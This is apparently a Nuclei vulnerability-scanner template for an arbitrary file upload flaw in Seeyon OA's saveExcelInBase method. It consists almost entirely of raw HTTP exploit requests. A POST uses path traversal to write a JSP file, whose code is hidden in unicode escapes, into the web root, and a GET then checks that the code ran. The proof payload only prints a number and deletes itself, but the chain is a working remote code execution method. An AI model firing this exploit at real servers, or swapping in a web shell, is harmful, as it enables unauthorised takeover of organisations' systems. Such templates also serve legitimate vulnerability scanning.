id: seeyon-oa-saveexcelinbase-fileupload

info:
  name: 致远OA saveExcelInBase 任意文件上传
  author: SleepingBag945
  severity: critical

variables:
  filename: '{{rand_base(5)}}'

http:
  - raw:
      - |
        POST /seeyon/ajax.do;JSESSIONID=31233E76D97A1601201720C5AB57F7CBE HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0
        Content-Type: application/x-www-form-urlencoded

        managerMethod=saveExcelInBase&managerName=fileToExcelManager&method=ajaxAction&arguments=["../webapps/ROOT/{{filename}}.jsp", "", {"columnName": ["\u003c\u0025\u006f\u0075\u0074\u002e\u0070\u0072\u0069\u006e\u0074\u006c\u006e\u0028\u0031\u0031\u0031\u002a\u0031\u0031\u0031\u0029\u003b\u006e\u0065\u0077\u0020\u006a\u0061\u0076\u0061\u002e\u0069\u006f\u002e\u0046\u0069\u006c\u0065\u0028\u0061\u0070\u0070\u006c\u0069\u0063\u0061\u0074\u0069\u006f\u006e\u002e\u0067\u0065\u0074\u0052\u0065\u0061\u006c\u0050\u0061\u0074\u0068\u0028\u0072\u0065\u0071\u0075\u0065\u0073\u0074\u002e\u0067\u0065\u0074\u0053\u0065\u0072\u0076\u006c\u0065\u0074\u0050\u0061\u0074\u0068\u0028\u0029\u0029\u0029\u002e\u0064\u0065\u006c\u0065\u0074\u0065\u0028\u0029\u003b\u0025\u003e"]}]

      - |
        GET /{{filename}}.jsp HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0

    matchers:
      - type: dsl
        dsl:
          - "status_code_2 == 200 && contains(body_2, '12321')"
